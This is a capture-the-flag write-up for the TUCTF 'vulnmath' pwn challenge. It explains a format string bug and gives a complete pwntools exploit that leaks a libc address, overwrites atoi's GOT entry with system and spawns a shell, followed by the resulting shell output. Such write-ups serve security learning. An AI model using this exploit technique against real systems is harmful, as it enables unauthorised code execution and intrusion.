Rating: 0

#### Given the binary with the detail like this below
```
chao at Yu in [~/Documents/WriteUps/TUCTF/pwn/vulnmath] on git:master ✔︎ 7e4a166 "Added so many new pwn"
16:53:27 › file vulnmath && checksec vulnmath
vulnmath: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, BuildID[sha1]=ba48ed39bdaaa3ddfc1bab6e8f45c8ee92e552bc, for GNU/Linux 3.2.0, not stripped
[*] Checking for new versions of pwntools
To disable this functionality, set the contents of /home/chao/.pwntools-cache/update to 'never'.
[*] You have the latest version of Pwntools (3.13.0)
[*] '/home/chao/Documents/WriteUps/TUCTF/pwn/vulnmath/vulnmath'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)

```
After a research, we knew that this binary has a format string bug.
Looks like it has no canary and PIE, but NX is enabled. The idea is to overwrite **GOT address** of **atoi** into **system**.
First, we find the index where we can overwrite. we found it at index 7.
To overwrite the **atoi** into **system**, first we need to leak the libc. We found the libc leak of **__libc_start_main_ret** at index 23.
Then for the **GOT overwrite**, we made this exploit

```
def exploit(p, libc_diff, libc):
binary = ELF("vulnmath")
payload = ''
payload += '%23$p'

p.sendline(payload)
p.recvuntil("Incorrect!\n")

libc_leak = int(p.recvline()[:-1], 16)
log.info("Libc Diff : {}".format(hex(libc_diff)))
log.info("__Libc_start_main: {}".format(hex(libc_leak)))
libc.address = libc_leak - libc_diff
log.info("Libc base : {}".format(hex(libc.address)))
libc_system = libc.symbols['system']
log.info("Libc system : {}".format(hex(libc_system)))

atoi_got = binary.symbols["got.atoi"]
log.info("atoi@got: {}".format(hex(atoi_got)))
overwrite = str(hex(libc_system))[2:]
first_overwrite = int(overwrite[4:], 16)
log.info("First overwrite: {} or in hex {}".format(first_overwrite, hex(first_overwrite)))
second_overwrite = int(overwrite[:4], 16)
log.info("Second overwrite: {} or in hex {}".format(second_overwrite, hex(second_overwrite)))

payload = ""
payload += p32(atoi_got)
payload += p32(atoi_got + 2)
payload += "%6${}p".format(first_overwrite - len(payload))
payload += "%6$n"
payload += "%{}p".format(second_overwrite - first_overwrite)
payload += "%7$n"

# gdb.attach(p, """
# brva *0x08049446
# brva *0x0804944c
# c
# """)

p.sendline(payload)
sleep(1)
p.sendline("/bin/sh\x00")
p.sendline("ls -la && cat f*")
p.interactive()

if __name__ == "__main__":
if len(sys.argv) < 2:
log.info("Argument needed!")
log.info("Usage: python {} <local/remote>".format(sys.argv[0]))
sys.exit(0)
elif sys.argv[1] == "local":
p = process("./vulnmath")
libc = ELF("libc6_2.27-3ubuntu1_i386.so")
exploit(p, libc.symbols["__libc_start_main"] + 241, libc)
elif sys.argv[1] == "remote":
p = remote("chal.tuctf.com", 30502)
libc = ELF("libc.so.6")
exploit(p, libc.symbols["__libc_start_main"] + 249, libc)
else:
sys.exit(0)
```
Then run the exploit. we should get the shell
```
> > $ id
uid=1000(chao) gid=1000(chao) groups=1000(chao),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),999(docker)
```